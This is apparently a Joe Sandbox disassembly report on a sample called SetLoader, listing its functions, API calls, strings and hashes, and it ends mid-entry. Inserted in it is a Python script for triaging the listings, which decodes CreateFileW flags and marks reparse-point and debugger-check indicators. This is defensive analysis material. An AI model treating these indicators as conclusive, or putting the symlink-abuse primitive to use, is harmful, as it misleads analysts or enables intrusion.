                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,5CB4B331,?,00000000,00000001), ref: 0062EB53
                                              • _wcslen.LIBCMT ref: 0062EB8D
                                              • _wcslen.LIBCMT ref: 0062EBA1
                                              • _wcslen.LIBCMT ref: 0062EBC6
                                              • GetFileAttributesW.KERNEL32(?), ref: 0062EC0C
                                              • DeleteFileW.KERNEL32(?), ref: 0062EC1E
                                              • _swprintf.LIBCMT ref: 0062EC43
                                              • GetFileAttributesW.KERNEL32(?), ref: 0062EC52
                                              • MoveFileW.KERNEL32(?,?), ref: 0062EC6B
                                              • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0062EC7F
                                              • _wcslen.LIBCMT ref: 0062ECFA
                                              • _wcslen.LIBCMT ref: 0062ED03
                                              • SetWindowTextW.USER32(?,?), ref: 0062ED62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                              • API String ID: 2983673336-312220925
                                              • Opcode ID: 9d482cc6cec4662cc66c33fd7b55faebe1ace91138f2d06f94bac8ebfce76d43
                                              • Instruction ID: feb4fb86fea93b929cd551de1ec7acdce433cbc9e67e37d426100fa3e0e2c1dd
                                              • Opcode Fuzzy Hash: 9d482cc6cec4662cc66c33fd7b55faebe1ace91138f2d06f94bac8ebfce76d43
                                              • Instruction Fuzzy Hash: 05F18F72900669AACB31EFA0EC55EEF33BEEF09310F04043AF909D7150EB719A458B54
                                              APIs
                                                • Part of subcall function 00611366: GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                                • Part of subcall function 00611366: SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0062E602
                                              • GetDlgItem.USER32(?,0000006C), ref: 0062E631
                                              • SetFocus.USER32(00000000), ref: 0062E638
                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0062E66C
                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0062E69F
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0062E6B5
                                                • Part of subcall function 0062CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0062CBEE
                                                • Part of subcall function 0062CBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0062CC05
                                                • Part of subcall function 0062CBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 0062CC19
                                                • Part of subcall function 0062CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0062CC2A
                                                • Part of subcall function 0062CBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0062CC42
                                                • Part of subcall function 0062CBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0062CC66
                                                • Part of subcall function 0062CBC8: _swprintf.LIBCMT ref: 0062CC85
                                              • _swprintf.LIBCMT ref: 0062E704
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0062E717
                                              • FindClose.KERNEL32(00000000), ref: 0062E71E
                                              • _swprintf.LIBCMT ref: 0062E773
                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0062E786
                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0062E7A0
                                              • _swprintf.LIBCMT ref: 0062E7D9
                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0062E7EC
                                              • _swprintf.LIBCMT ref: 0062E83C
                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0062E84F
                                                • Part of subcall function 0062D0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0062D0E1
                                                • Part of subcall function 0062D0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,0065272C,?,?), ref: 0062D12A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                              • String ID: %s %s$-c$REPLACEFILEDLG
                                              • API String ID: 662400606-4208485940
                                              • Opcode ID: fb0107a9ec8c33c3cc861b03a876ad72d56c414ab0c40afc2a21573fdc89f7f5
                                              • Instruction ID: 7bd14102546f0d211c64b44e710b61462eefffc22f98141e9cf724b9db6a07cf
                                              • Opcode Fuzzy Hash: fb0107a9ec8c33c3cc861b03a876ad72d56c414ab0c40afc2a21573fdc89f7f5
                                              • Instruction Fuzzy Hash: 2F71E8B2648714BBE3709B60EC49FFF779EEB89700F04082DF64DD6181DA7699448B62
                                              APIs
                                              • _wcslen.LIBCMT ref: 0061807F
                                              • _wcslen.LIBCMT ref: 00618112
                                                • Part of subcall function 00618C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00618CB2
                                                • Part of subcall function 00618C95: OpenProcessToken.ADVAPI32(00000000), ref: 00618CB9
                                                • Part of subcall function 00618C95: GetLastError.KERNEL32 ref: 00618CF6
                                                • Part of subcall function 00618C95: CloseHandle.KERNEL32(?), ref: 00618D05
                                                • Part of subcall function 0061BC65: DeleteFileW.KERNELBASE(?,?,?,?,0061B14B,?,00000000,0061AF6E,5CB4B331,00000000,0064517A,000000FF,?,00618882,?,?), ref: 0061BC82
                                                • Part of subcall function 0061BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,0061B14B,?,00000000,0061AF6E,5CB4B331,00000000,0064517A,000000FF,?,00618882,?), ref: 0061BCAE
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 006181C1
                                              • CloseHandle.KERNEL32(00000000), ref: 006181DD
                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,5CB4B331,00000000), ref: 00618329
                                                • Part of subcall function 0061B7E2: FlushFileBuffers.KERNEL32(?), ref: 0061B7FC
                                                • Part of subcall function 0061B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 0061B8B0
                                                • Part of subcall function 0061AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,0061AF75,5CB4B331,00000000,0064517A,000000FF,?,00618882,?,?), ref: 0061AFEB
                                                • Part of subcall function 0061C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0061BF5E,?,?), ref: 0061C305
                                                • Part of subcall function 0061C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0061BF5E,?,?), ref: 0061C334
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$Close$AttributesCreateDeleteHandleProcess_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationOpenTimeToken
                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                              • API String ID: 1577582944-3508440684
                                              • Opcode ID: d964b811a7428c27c7a6195af9dc4aa884c6cc9dc15cc5de6c9c9cc3bb2b213e
                                              • Instruction ID: 4312263a233e8c0669a8d7342fb371d20f2f9ad9299c371753af0a4583e619d4
                                              • Opcode Fuzzy Hash: d964b811a7428c27c7a6195af9dc4aa884c6cc9dc15cc5de6c9c9cc3bb2b213e
                                              • Instruction Fuzzy Hash: 36D1A8B1900249AFDB25DFA0CC41BEEB7AEBF05700F08451EFA55E7241DB74AA84C7A5
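The per-function API listings in this report are quicker to triage once the call lines are parsed and the CreateFileW arguments are decoded. The Python below is an added example for doing that; it is not part of the Joe Sandbox report, of the Joe Sandbox IDA plugin, or of the analysed sample, and the function names (parse_api_lines, decode_createfile, triage) are the example's own. It handles the three line shapes the report uses (a direct call with an argument list, a call with no argument list such as IsDebuggerPresent.KERNEL32 ref: ..., and a "Part of subcall function X:" line), names the dwDesiredAccess, dwCreationDisposition and dwFlagsAndAttributes values with the Win32 SDK constants, and reports two things a reviewer checks first. One is whether a call opens a reparse point itself rather than its target: the second CreateFileW above passes 02200000, which is FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, and the same function carries the SeCreateSymbolicLinkPrivilege, SeRestorePrivilege, UNC\ and \??\ strings; an archive extractor that restores symbolic links needs exactly this combination, so read it together with what the function writes. The other is whether the IsDebuggerPresent, SetUnhandledExceptionFilter and UnhandledExceptionFilter triple is present; the MSVC C runtime's security-failure fallback emits the same three calls (the block later in this section that contains them also calls IsProcessorFeaturePresent(00000017), PF_FASTFAIL_AVAILABLE), so the flag is a prompt to read the function, not a verdict of deliberate anti-debugging. The sample lines embedded in the block are copied from this report's API listings.

```python
"""Parse one Joe Sandbox 'APIs' block and decode its CreateFileW arguments.
Added example, not part of the report or of the analysed sample; the line
shape is the report's, the constant names are from the Win32 SDK headers."""
import json
import re
from dataclasses import dataclass
from typing import Optional

# Line shapes taken from the report: bullet, optional subcall prefix,
# API.MODULE, optional (args), 'ref: address'; the argument list may be absent.
_LINE = re.compile(
    r"^\s*[•*-]?\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # raw hex tokens; '?' = value not recovered by the analyser
    ref: int                # address of the call site
    subcall: Optional[int]  # callee address when the call sits inside a subcall

def parse_api_lines(text: str) -> list:
    """Turn the bullet lines of an 'APIs' block into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:            # headings such as 'APIs' / 'Strings' end up here
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls

# Win32 constants for the CreateFileW parameters that matter during triage.
_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
_FLAGS = {0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
          0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
          0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
          0x00000080: "FILE_ATTRIBUTE_NORMAL"}

def _bits(value: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items(), reverse=True) if value & bit]

def decode_createfile(call: ApiCall) -> Optional[dict]:
    """Decode dwDesiredAccess (arg 1), dwCreationDisposition (arg 4) and
    dwFlagsAndAttributes (arg 5); None if not CreateFileW or a value is '?'."""
    if call.api != "CreateFileW" or len(call.args) < 6:
        return None
    try:
        access, disposition, flags = (int(call.args[i], 16) for i in (1, 4, 5))
    except ValueError:
        return None
    return {"ref": f"{call.ref:08X}",
            "access": _bits(access, _ACCESS),
            "disposition": _DISPOSITION.get(disposition, hex(disposition)),
            "flags": _bits(flags, _FLAGS),
            # Opens the reparse point itself rather than its target: needed by
            # symlink-aware extractors and by link-abuse primitives alike.
            "opens_reparse_point": bool(flags & 0x00200000)}

_ANTI_DEBUG = {"IsDebuggerPresent", "SetUnhandledExceptionFilter",
               "UnhandledExceptionFilter"}

def triage(text: str) -> dict:
    """Summarise a block: direct vs. subcall APIs, decoded CreateFileW calls
    and two indicators a reviewer checks first."""
    calls = parse_api_lines(text)
    decoded = [d for d in map(decode_createfile, calls) if d]
    names = {c.api for c in calls}
    return {
        "direct": sorted(c.api for c in calls if c.subcall is None),
        "via_subcall": sorted({c.api for c in calls if c.subcall is not None}),
        "createfile": decoded,
        # The MSVC CRT's fast-fail fallback emits the same three calls, so this
        # is a prompt to read the function, not proof of anti-debugging.
        "antidebug_triple": _ANTI_DEBUG <= names,
        "opens_reparse_point": any(d["opens_reparse_point"] for d in decoded),
    }

# Lines copied from this report's API listings (from two function blocks).
SAMPLE = """\
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 006181C1
• CloseHandle.KERNEL32(00000000), ref: 006181DD
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,5CB4B331,00000000), ref: 00618329
  • Part of subcall function 0061BC65: DeleteFileW.KERNELBASE(?,?,?,?,0061B14B,?,00000000,0061AF6E,5CB4B331,00000000,0064517A,000000FF,?,00618882,?,?), ref: 0061BC82
• IsDebuggerPresent.KERNEL32 ref: 006320A2
"""

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

Paste a whole "APIs" block into SAMPLE (or read it from a file) to get the summary for one function; subcall lines are kept apart from direct calls because the report attributes them to a callee, not to the function being listed. Only the three CreateFileW parameters that the analyser recovers as literals are decoded; any argument shown as "?" leaves the call undecoded rather than guessed.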
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                              • API String ID: 4168288129-2761157908
                                              • Opcode ID: cd457cda8bb6db918238a4229004bb69e6d424bf0e5b55dd2fdc5596c2b71844
                                              • Instruction ID: 67e136dd4dbaee02c602891ec5225b5d03df82e3613535e55fb923a6306e0862
                                              • Opcode Fuzzy Hash: cd457cda8bb6db918238a4229004bb69e6d424bf0e5b55dd2fdc5596c2b71844
                                              • Instruction Fuzzy Hash: E4C27E71E086288FEB65CF28DD407EAB7B6EB85304F1541EAD90DE7241E775AE818F40
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _swprintf
                                              • String ID: CMT$P'a$h%u$hc%u
                                              • API String ID: 589789837-1875271218
                                              • Opcode ID: c310d7eb94473fed7c5dd676e929bd15cf917b3a978e61a34b191ffd34fad76f
                                              • Instruction ID: 65f5fe91b1d19a7dbbff833ef87b5e41727bf7cdb9dc7aeb2e1e74df5365ea29
                                              • Opcode Fuzzy Hash: c310d7eb94473fed7c5dd676e929bd15cf917b3a978e61a34b191ffd34fad76f
                                              • Instruction Fuzzy Hash: 8B42D2719052449ADF24DF74C895BEE7BA6AF15300F0C047DFC5A9B282DB70AAC9CB61
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00631FD6
                                              • IsDebuggerPresent.KERNEL32 ref: 006320A2
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006320C2
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 006320CC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                              • String ID:
                                              • API String ID: 254469556-0
                                              • Opcode ID: 6d3ff6b02018497cf762b4ea40b0238d3d962c9cce8b7069f4989e3f65abe4a9
                                              • Instruction ID: daf37903c281f385b3634f76c8fa68547bc3c0f54f689bee91470ef18e5c1aa3
                                              • Opcode Fuzzy Hash: 6d3ff6b02018497cf762b4ea40b0238d3d962c9cce8b7069f4989e3f65abe4a9
                                              • Instruction Fuzzy Hash: 6D312B75D053199BDB60DFA4D9897CCBBB8BF05300F1040AAE50DAB250EB715A84CF45
                                              APIs
                                              • VirtualQuery.KERNEL32(80000000,00630AC5,0000001C,00630CBA,00000000,?,?,?,?,?,?,?,00630AC5,00000004,00675D24,00630D4A), ref: 00630B91
                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00630AC5,00000004,00675D24,00630D4A), ref: 00630BAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: InfoQuerySystemVirtual
                                              • String ID: D
                                              • API String ID: 401686933-2746444292
                                              • Opcode ID: 57628bdcb27816c3488d4d32e0b177893ff229be2ab26a80f9d9455493711fd1
                                              • Instruction ID: 2bc5309bea9611ffe632fc1a21626ffaff5336d74597d80f50d4eafdbdf05817
                                              • Opcode Fuzzy Hash: 57628bdcb27816c3488d4d32e0b177893ff229be2ab26a80f9d9455493711fd1
                                              • Instruction Fuzzy Hash: DF01D472600109ABDB14DF29DC15BDEBBAAAFC5328F08C124AD5AD7244D634E805C6C0
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00636577
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00636581
                                              • UnhandledExceptionFilter.KERNEL32(0063B700,?,?,?,?,?,00000000), ref: 0063658E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: d9b1af0749f9daf370f62d5836ecec115b155a4ce9be21de589313f85835606e
                                              • Instruction ID: 8bf5796001833840f26247962fa6e2450b3fe1c9b7d6e7993ca2e39f5b97317d
                                              • Opcode Fuzzy Hash: d9b1af0749f9daf370f62d5836ecec115b155a4ce9be21de589313f85835606e
                                              • Instruction Fuzzy Hash: 0631F474901228ABCB61DF28D9897CCBBB9BF08310F1041EAF80CA7251E7309F858F94
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0063B5C6,?,0063A616,0063B5C6,0064F7B0,0000000C,0063A76D,0063B5C6,00000002,00000000,?,0063B5C6), ref: 0063A661
                                              • TerminateProcess.KERNEL32(00000000,?,0063A616,0063B5C6,0064F7B0,0000000C,0063A76D,0063B5C6,00000002,00000000,?,0063B5C6), ref: 0063A668
                                              • ExitProcess.KERNEL32 ref: 0063A67A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 1bfbf5a39a374cd0fd67fb503b2820c483457f3815b2375a34297fdd468febc0
                                              • Instruction ID: 3ab8497012543b94052d9d616d9018ec6064366241af44425e160e029211dfb9
                                              • Opcode Fuzzy Hash: 1bfbf5a39a374cd0fd67fb503b2820c483457f3815b2375a34297fdd468febc0
                                              • Instruction Fuzzy Hash: 82E0B635440148AFCF116FA4DE0AA8C3B6BEB43745F044414F8498B232CB36ED46DA96
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ce33ea9f4ec23801448980fb748551bc40d278e625499f9c7663d63746eea6e2
                                              • Instruction ID: 9b13599dcf7a4d8a27970a6f122e6296299ff2959b289de9893e4bca04ba82cc
                                              • Opcode Fuzzy Hash: ce33ea9f4ec23801448980fb748551bc40d278e625499f9c7663d63746eea6e2
                                              • Instruction Fuzzy Hash: BC021C71E002199BDF14CFA9C8806EEF7F2EF48314F25826AD919E7385D731AE418B94
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0062D0E1
                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0065272C,?,?), ref: 0062D12A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FormatInfoLocaleNumber
                                              • String ID:
                                              • API String ID: 2169056816-0
                                              • Opcode ID: e361af8c12211734673ca3cc86031789784e6171c81268f750041ac6607e1c04
                                              • Instruction ID: 178116a07700d22d9f81e03241bf4313ed190ee103edb2be8a9feb8b2ea9c23b
